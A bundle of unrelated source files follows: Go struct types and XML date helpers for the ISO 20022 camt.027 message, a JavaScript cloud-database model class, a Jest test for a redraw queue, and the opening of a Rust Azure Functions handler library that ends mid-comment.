TwnNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TwnNm,omitempty"`
TwnLctnNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TwnLctnNm,omitempty"`
DstrctNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DstrctNm,omitempty"`
CtrySubDvsn Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtrySubDvsn,omitempty"`
Ctry CountryCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ctry,omitempty"`
AdrLine []Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdrLine,omitempty"`
}
// May be one of LETT, MAIL, PHON, FAXX, CELL
type PreferredContactMethod1Code string
// May be one of HIGH, NORM
type Priority2Code string
type ProxyAccountIdentification1 struct {
Tp ProxyAccountType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Id Max2048Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
}
type ProxyAccountType1Choice struct {
Cd ExternalProxyAccountType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type Purpose2Choice struct {
Cd ExternalPurpose1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ReferredDocumentInformation7 struct {
Tp ReferredDocumentType4 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Nb Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nb,omitempty"`
RltdDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RltdDt,omitempty"`
LineDtls []DocumentLineInformation1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LineDtls,omitempty"`
}
type ReferredDocumentType3Choice struct {
Cd DocumentType6Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ReferredDocumentType4 struct {
CdOrPrtry ReferredDocumentType3Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdOrPrtry"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type RemittanceAmount2 struct {
DuePyblAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DuePyblAmt,omitempty"`
DscntApldAmt []DiscountAmountAndType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DscntApldAmt,omitempty"`
CdtNoteAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtNoteAmt,omitempty"`
TaxAmt []TaxAmountAndType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxAmt,omitempty"`
AdjstmntAmtAndRsn []DocumentAdjustment1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdjstmntAmtAndRsn,omitempty"`
RmtdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RmtdAmt,omitempty"`
}
type RemittanceAmount3 struct {
DuePyblAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DuePyblAmt,omitempty"`
DscntApldAmt []DiscountAmountAndType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DscntApldAmt,omitempty"`
CdtNoteAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtNoteAmt,omitempty"`
TaxAmt []TaxAmountAndType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxAmt,omitempty"`
AdjstmntAmtAndRsn []DocumentAdjustment1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdjstmntAmtAndRsn,omitempty"`
RmtdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RmtdAmt,omitempty"`
}
type RemittanceInformation21 struct {
Ustrd []Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ustrd,omitempty"`
Strd []StructuredRemittanceInformation17 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Strd,omitempty"`
}
// May be one of FRST, RCUR, FNAL, OOFF, RPRE
type SequenceType3Code string
type ServiceLevel8Choice struct {
Cd ExternalServiceLevel1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type SettlementInstruction11 struct {
SttlmMtd SettlementMethod1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SttlmMtd"`
SttlmAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SttlmAcct,omitempty"`
ClrSys ClearingSystemIdentification3Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClrSys,omitempty"`
InstgRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstgRmbrsmntAgt,omitempty"`
InstgRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstgRmbrsmntAgtAcct,omitempty"`
InstdRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdRmbrsmntAgt,omitempty"`
InstdRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdRmbrsmntAgtAcct,omitempty"`
ThrdRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ThrdRmbrsmntAgt,omitempty"`
ThrdRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ThrdRmbrsmntAgtAcct,omitempty"`
}
type SettlementInstruction13 struct {
InstgRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstgRmbrsmntAgt,omitempty"`
InstgRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstgRmbrsmntAgtAcct,omitempty"`
InstdRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdRmbrsmntAgt,omitempty"`
InstdRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdRmbrsmntAgtAcct,omitempty"`
}
// May be one of INDA, INGA, COVE, CLRG
type SettlementMethod1Code string
type StructuredRemittanceInformation17 struct {
RfrdDocInf []ReferredDocumentInformation7 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RfrdDocInf,omitempty"`
RfrdDocAmt RemittanceAmount2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RfrdDocAmt,omitempty"`
CdtrRefInf CreditorReferenceInformation2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrRefInf,omitempty"`
Invcr PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Invcr,omitempty"`
Invcee PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Invcee,omitempty"`
TaxRmt TaxData1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxRmt,omitempty"`
GrnshmtRmt Garnishment3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 GrnshmtRmt,omitempty"`
AddtlRmtInf []Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AddtlRmtInf,omitempty"`
}
type SupplementaryData1 struct {
PlcAndNm Max350Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PlcAndNm,omitempty"`
Envlp SupplementaryDataEnvelope1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Envlp"`
}
type SupplementaryDataEnvelope1 struct {
Item string `xml:",any"`
}
type TaxAmount3 struct {
Rate float64 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rate,omitempty"`
TaxblBaseAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxblBaseAmt,omitempty"`
TtlAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TtlAmt,omitempty"`
Dtls []TaxRecordDetails3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dtls,omitempty"`
}
type TaxAmountAndType1 struct {
Tp TaxAmountType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
}
type TaxAmountType1Choice struct {
Cd ExternalTaxAmountType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type TaxAuthorisation1 struct {
Titl Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Titl,omitempty"`
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
}
type TaxData1 struct {
Cdtr TaxParty1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cdtr,omitempty"`
Dbtr TaxParty2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dbtr,omitempty"`
UltmtDbtr TaxParty2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 UltmtDbtr,omitempty"`
AdmstnZone Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdmstnZone,omitempty"`
RefNb Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RefNb,omitempty"`
Mtd Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Mtd,omitempty"`
TtlTaxblBaseAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TtlTaxblBaseAmt,omitempty"`
TtlTaxAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TtlTaxAmt,omitempty"`
Dt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dt,omitempty"`
SeqNb float64 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SeqNb,omitempty"`
Rcrd []TaxRecord3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rcrd,omitempty"`
}
type TaxParty1 struct {
TaxId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxId,omitempty"`
RegnId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RegnId,omitempty"`
TaxTp Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxTp,omitempty"`
}
type TaxParty2 struct {
TaxId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxId,omitempty"`
RegnId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RegnId,omitempty"`
TaxTp Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxTp,omitempty"`
Authstn TaxAuthorisation1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Authstn,omitempty"`
}
type TaxPeriod3 struct {
Yr ISOYear `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Yr,omitempty"`
Tp TaxRecordPeriod1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
FrToDt DatePeriod2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrToDt,omitempty"`
}
type TaxRecord3 struct {
Tp Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Ctgy Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ctgy,omitempty"`
CtgyDtls Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtgyDtls,omitempty"`
DbtrSts Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DbtrSts,omitempty"`
CertId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CertId,omitempty"`
FrmsCd Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrmsCd,omitempty"`
Prd TaxPeriod3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prd,omitempty"`
TaxAmt TaxAmount3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxAmt,omitempty"`
AddtlInf Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AddtlInf,omitempty"`
}
type TaxRecordDetails3 struct {
Prd TaxPeriod3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prd,omitempty"`
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
}
// May be one of MM01, MM02, MM03, MM04, MM05, MM06, MM07, MM08, MM09, MM10, MM11, MM12, QTR1, QTR2, QTR3, QTR4, HLF1, HLF2
type TaxRecordPeriod1Code string
// Must match the pattern [a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89ab][a-f0-9]{3}-[a-f0-9]{12}
type UUIDv4Identifier string
type UnderlyingGroupInformation1 struct {
OrgnlMsgId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgId"`
OrgnlMsgNmId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgNmId"`
OrgnlCreDtTm ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCreDtTm,omitempty"`
OrgnlMsgDlvryChanl Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgDlvryChanl,omitempty"`
}
type UnderlyingPaymentInstruction7 struct {
OrgnlGrpInf UnderlyingGroupInformation1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlGrpInf,omitempty"`
OrgnlPmtInfId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlPmtInfId,omitempty"`
OrgnlInstrId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlInstrId,omitempty"`
OrgnlEndToEndId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlEndToEndId,omitempty"`
OrgnlUETR UUIDv4Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlUETR,omitempty"`
OrgnlInstdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlInstdAmt"`
ReqdExctnDt DateAndDateTime2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReqdExctnDt,omitempty"`
ReqdColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReqdColltnDt,omitempty"`
OrgnlTxRef OriginalTransactionReference35 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlTxRef,omitempty"`
}
type UnderlyingPaymentTransaction6 struct {
OrgnlGrpInf UnderlyingGroupInformation1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlGrpInf,omitempty"`
OrgnlInstrId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlInstrId,omitempty"`
OrgnlEndToEndId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlEndToEndId,omitempty"`
OrgnlTxId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlTxId,omitempty"`
OrgnlUETR UUIDv4Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlUETR,omitempty"`
OrgnlIntrBkSttlmAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlIntrBkSttlmAmt"`
OrgnlIntrBkSttlmDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlIntrBkSttlmDt"`
OrgnlTxRef OriginalTransactionReference35 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlTxRef,omitempty"`
}
type UnderlyingStatementEntry3 struct {
OrgnlGrpInf OriginalGroupInformation29 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlGrpInf,omitempty"`
OrgnlStmtId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlStmtId,omitempty"`
OrgnlNtryId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlNtryId,omitempty"`
OrgnlUETR UUIDv4Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlUETR,omitempty"`
}
type UnderlyingTransaction7Choice struct {
Initn UnderlyingPaymentInstruction7 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Initn,omitempty"`
IntrBk UnderlyingPaymentTransaction6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 IntrBk,omitempty"`
StmtNtry UnderlyingStatementEntry3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 StmtNtry,omitempty"`
}
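// The xsd* helper types below adapt []byte and time.Time values to the
// encoding.TextMarshaler/TextUnmarshaler interfaces used by encoding/xml,
// so Max10KBinary, ISODate, ISODateTime and ISOYear round-trip through
// their XSD lexical forms (base64, date, dateTime and gYear).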
type xsdBase64Binary []byte
func (b *xsdBase64Binary) UnmarshalText(text []byte) (err error) {
*b, err = base64.StdEncoding.DecodeString(string(text))
return
}
func (b xsdBase64Binary) MarshalText() ([]byte, error) {
var buf bytes.Buffer
enc := base64.NewEncoder(base64.StdEncoding, &buf)
enc.Write([]byte(b))
enc.Close()
return buf.Bytes(), nil
}
type xsdDate time.Time
func (t *xsdDate) UnmarshalText(text []byte) error {
return _unmarshalTime(text, (*time.Time)(t), "2006-01-02")
}
func (t xsdDate) MarshalText() ([]byte, error) {
return _marshalTime((time.Time)(t), "2006-01-02")
}
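// MarshalXML and MarshalXMLAttr skip zero time values entirely, so
// optional date fields are omitted rather than serialized as empty
// elements or attributes.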
func (t xsdDate) MarshalXML(e *xml.Encoder, start xml.StartElement) error {
if (time.Time)(t).IsZero() {
return nil
}
m, err := t.MarshalText()
if err != nil {
return err
}
return e.EncodeElement(m, start)
}
func (t xsdDate) MarshalXMLAttr(name xml.Name) (xml.Attr, error) {
if (time.Time)(t).IsZero() {
return xml.Attr{}, nil
}
m, err := t.MarshalText()
return xml.Attr{Name: name, Value: string(m)}, err
}
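// _unmarshalTime parses with the given layout and, on failure, retries
// with a numeric timezone suffix appended, since XSD date/time values
// may optionally carry one.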
func _unmarshalTime(text []byte, t *time.Time, format string) (err error) {
s := string(bytes.TrimSpace(text))
*t, err = time.Parse(format, s)
if _, ok := err.(*time.ParseError); ok {
*t, err = time.Parse(format+"Z07:00", s)
}
return err
}
func _marshalTime(t time.Time, format string) ([]byte, error) {
return []byte(t.Format(format + "Z07:00")), nil
}
type xsdDateTime time.Time
func (t *xsdDateTime) UnmarshalText(text []byte) error {
return _unmarshalTime(text, (*time.Time)(t), "2006-01-02T15:04:05.999999999")
}
func (t xsdDateTime) MarshalText() ([]byte, error) {
return _marshalTime((time.Time)(t), "2006-01-02T15:04:05.999999999")
}
func (t xsdDateTime) MarshalXML(e *xml.Encoder, start xml.StartElement) error {
if (time.Time)(t).IsZero() {
return nil
}
m, err := t.MarshalText()
if err != nil {
return err
}
return e.EncodeElement(m, start)
}
func (t xsdDateTime) MarshalXMLAttr(name xml.Name) (xml.Attr, error) {
if (time.Time)(t).IsZero() {
return xml.Attr{}, nil
}
m, err := t.MarshalText()
return xml.Attr{Name: name, Value: string(m)}, err
}
type xsdGYear time.Time
func (t *xsdGYear) UnmarshalText(text []byte) error {
return _unmarshalTime(text, (*time.Time)(t), "2006")
}
func (t xsdGYear) MarshalText() ([]byte, error) {
return _marshalTime((time.Time)(t), "2006")
}
func (t xsdGYear) MarshalXML(e *xml.Encoder, start xml.StartElement) error {
if (time.Time)(t).IsZero() {
return nil
}
m, err := t.MarshalText()
if err != nil {
return err
}
return e.EncodeElement(m, start)
}
func (t xsdGYear) MarshalXMLAttr(name xml.Name) (xml.Attr, error) {
if (time.Time)(t).IsZero() {
return xml.Attr{}, nil
}
m, err := t.MarshalText()
return xml.Attr{Name: name, Value: string(m)}, err
}
database.class.js

import find from 'lodash/find';
import Base from './base.class';
import {
SSL_MODE_REQUIRED,
SSL_MODE_NA,
SSL_MODE_SSL_TLS,
} from './databases.constants';
import { ENGINES_NAMES } from './engines.constants';
export default class Database extends Base {
constructor({
createdAt,
plan,
id,
status,
nodeNumber,
description,
maintenanceWindow,
version,
domain,
networkType,
networkId,
subnetId,
engine,
nodes,
flavor,
sslMode,
host,
port,
uri,
}) {
super();
this.updateData({
createdAt,
plan,
id,
status,
nodeNumber,
description,
maintenanceWindow,
version,
domain,
networkType,
networkId,
subnetId,
engine,
nodes,
flavor,
sslMode,
host,
port,
uri,
});
}
setStatus(status) {
this.status = status;
}
get region() {
return this.nodes[0]?.region;
}
getEngineLabel() {
return ENGINES_NAMES[this.engine];
}
addNode(node) {
return this.nodes.push(node);
}
getNode(nodeId) {
return find(this.nodes, { id: nodeId });
}
setNodeStatus(node, status) {
const nodeObj = this.getNode(node.id);
nodeObj.status = status;
}
deleteNode(nodeId) {
this.nodes = this.nodes.filter((n) => n.id !== nodeId);
}
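// Upserts the given nodes: existing nodes (matched by id) are updated
// in place, unknown ones are appended.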
setNodes(nodes) {
nodes.forEach((node) => {
const nodeObj = this.getNode(node.id);
return nodeObj ? nodeObj.updateData(node) : this.addNode(node);
});
}
getEngineFromList(engines) {
if (!this.currentEngine) {
this.currentEngine = engines.find(
(engine) => engine.name === this.engine,
);
}
return this.currentEngine;
}
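// Maps the raw sslMode value onto a normalized key ('required', 'n/a'
// or 'SSL_TLS'); the result is memoized on first call.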
getSSLModeKey() {
if (!this.sslModeKey) {
this.sslModeKey = this.sslMode;
if (SSL_MODE_REQUIRED.includes(this.sslMode)) {
this.sslModeKey = 'required';
}
if (SSL_MODE_NA.includes(this.sslMode)) {
this.sslModeKey = 'n/a';
}
if (SSL_MODE_SSL_TLS.includes(this.sslMode)) {
this.sslModeKey = 'SSL_TLS';
}
}
return this.sslModeKey;
}
updateData(data) {
Object.assign(this, data);
}
}
documentSpec.js

import requestRedraw from '../src/requestRedraw';
describe('document', () => {
beforeEach(() => {
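// Stub requestAnimationFrame so requestRedraw can schedule a frame
// without a real browser event loop.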
global.requestAnimationFrame = () => {};
});
afterEach(() => {
delete global.requestAnimationFrame;
// Jest triggers test environment setup/teardown per test suite,
// not per test, so we reset '__d3fc-elements__' after each test here.
delete document['__d3fc-elements__'];
});
it('should enqueue a single element', () => {
document.body.innerHTML = '<div></div>';
const element = document.querySelector('div');
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
});
it('should not enqueue a duplicate element', () => {
document.body.innerHTML = '<div></div>';
const element = document.querySelector('div');
requestRedraw(element);
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
});
it('should enqueue an ancestor and drop the original element', () => {
document.body.innerHTML = '<div><a></a></div>';
let element = document.querySelector('a');
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
element = document.querySelector('div');
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
});
it('should not enqueue element if an ancestor is enqueued', () => {
document.body.innerHTML = '<div><a></a></div>';
let element = document.querySelector('div');
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
requestRedraw(document.querySelector('a'));
expect(document['__d3fc-elements__'].queue).toEqual([element]);
});
});
lib.rs

#![deny(rust_2018_idioms, warnings)]
#![deny(clippy::all, clippy::pedantic)]
#![allow(
clippy::default_trait_access,
clippy::let_underscore_drop,
clippy::let_unit_value,
clippy::missing_errors_doc,
clippy::shadow_unrelated,
clippy::similar_names,
clippy::too_many_lines,
clippy::type_complexity,
)]
use anyhow::Context;
#[macro_export]
macro_rules! run {
($($name:literal => $f:expr ,)*) => {
fn main() -> $crate::_reexports::anyhow::Result<()> {
use $crate::_reexports::anyhow::Context;
let runtime =
$crate::_reexports::tokio::runtime::Builder::new_current_thread()
.enable_io()
.enable_time()
.build()?;
let local_set = $crate::_reexports::tokio::task::LocalSet::new();
let () = local_set.block_on(&runtime, async {
let (
misc_logger,
settings,
incoming,
) = $crate::_init().await?;
$crate::_reexports::futures_util::pin_mut!(incoming);
let (
azure_subscription_id,
azure_auth,
azure_log_analytics_workspace_resource_group_name,
azure_log_analytics_workspace_name,
settings,
) = $crate::_parse_settings(&settings)?;
let log_sender =
$crate::_log_sender(
&azure_subscription_id,
&azure_log_analytics_workspace_resource_group_name,
&azure_log_analytics_workspace_name,
&azure_auth,
&misc_logger,
).await?;
let mut pending_requests = $crate::_reexports::futures_util::stream::FuturesUnordered::new();
while let Some(stream) = $crate::_next_stream(&mut incoming, &mut pending_requests, &misc_logger).await {
pending_requests.push(async {
let mut stream = stream;
let (mut read, mut write) = stream.split();
let mut buf = [std::mem::MaybeUninit::uninit(); 8192];
let mut buf = $crate::_reexports::tokio::io::ReadBuf::uninit(&mut buf);
let (method, path, logger) = loop {
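// _parse_request returns Ok(None) while the request headers are
// still incomplete; keep reading into the same buffer until they are.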
if let Some(req) = $crate::_parse_request(&mut read, &mut buf).await? {
break req;
}
};
$crate::_handle_request(method, path, &logger, &log_sender, &mut write, async {
Ok(match path {
$(
$name => Some($f(&azure_subscription_id, &azure_auth, &settings, &logger).await?),
)*
_ => None,
})
}).await?;
Ok(())
});
}
Ok::<_, $crate::_reexports::anyhow::Error>(())
})?;
Ok(())
}
};
}
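// A minimal usage sketch of the macro above (the route name and handler
// body here are illustrative, not part of any real function app):
//
// run! {
//     "my-function" => |_subscription_id, _auth, _settings, _logger| async move {
//         Ok(std::borrow::Cow::Borrowed("done"))
//     },
// }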
#[doc(hidden)]
pub mod _reexports {
pub use anyhow;
pub use futures_util;
pub use tokio;
}
#[doc(hidden)]
pub async fn _init() -> anyhow::Result<(log2::Logger, String, impl futures_util::stream::Stream<Item = anyhow::Result<tokio::net::TcpStream>>)> {
{
struct GlobalLogger;
impl log::Log for GlobalLogger {
fn enabled(&self, metadata: &log::Metadata<'_>) -> bool {
metadata.level() <= log::Level::Info
}
fn log(&self, record: &log::Record<'_>) {
// The original body is elided at this point in the source; as a
// minimal stand-in, write the record to stderr.
eprintln!("[{}] {}", record.level(), record.args());
}
fn flush(&self) {
}
}
let logger = GlobalLogger;
log::set_logger(Box::leak(Box::new(logger))).expect("could not set global logger");
log::set_max_level(log::LevelFilter::Info);
}
let misc_logger = log2::Logger::new(None, false);
let settings = std::env::var("SECRET_SETTINGS").context("could not read SECRET_SETTINGS env var")?;
let port = match std::env::var("FUNCTIONS_CUSTOMHANDLER_PORT") {
Ok(value) => value.parse().with_context(|| format!("could not parse FUNCTIONS_CUSTOMHANDLER_PORT value {:?}", value))?,
Err(std::env::VarError::NotPresent) => 8080,
Err(std::env::VarError::NotUnicode(value)) =>
return Err(anyhow::anyhow!("could not parse FUNCTIONS_CUSTOMHANDLER_PORT value {:?}", value)),
};
let listener = tokio::net::TcpListener::bind((std::net::Ipv4Addr::new(127, 0, 0, 1), port)).await?;
let incoming = futures_util::stream::try_unfold(listener, |listener| async {
let (stream, _) = listener.accept().await.context("could not accept connection")?;
Ok(Some((stream, listener)))
});
Ok((
misc_logger,
settings,
incoming,
))
}
#[doc(hidden)]
pub fn _parse_settings<'a, TSettings>(settings: &'a str) -> anyhow::Result<(
std::borrow::Cow<'a, str>,
azure::Auth,
std::borrow::Cow<'a, str>,
std::borrow::Cow<'a, str>,
TSettings,
)> where TSettings: serde::Deserialize<'a> {
#[derive(serde::Deserialize)]
struct LoggerSettings<'a, TSettings> {
/// The Azure subscription ID.
#[serde(borrow)]
azure_subscription_id: std::borrow::Cow<'a, str>,
/// The Azure authentication credentials.
///
/// Defaults to parsing `azure::Auth::ManagedIdentity` from the environment.
/// If not found, then debug builds fall back to parsing a service principal from this JSON object's
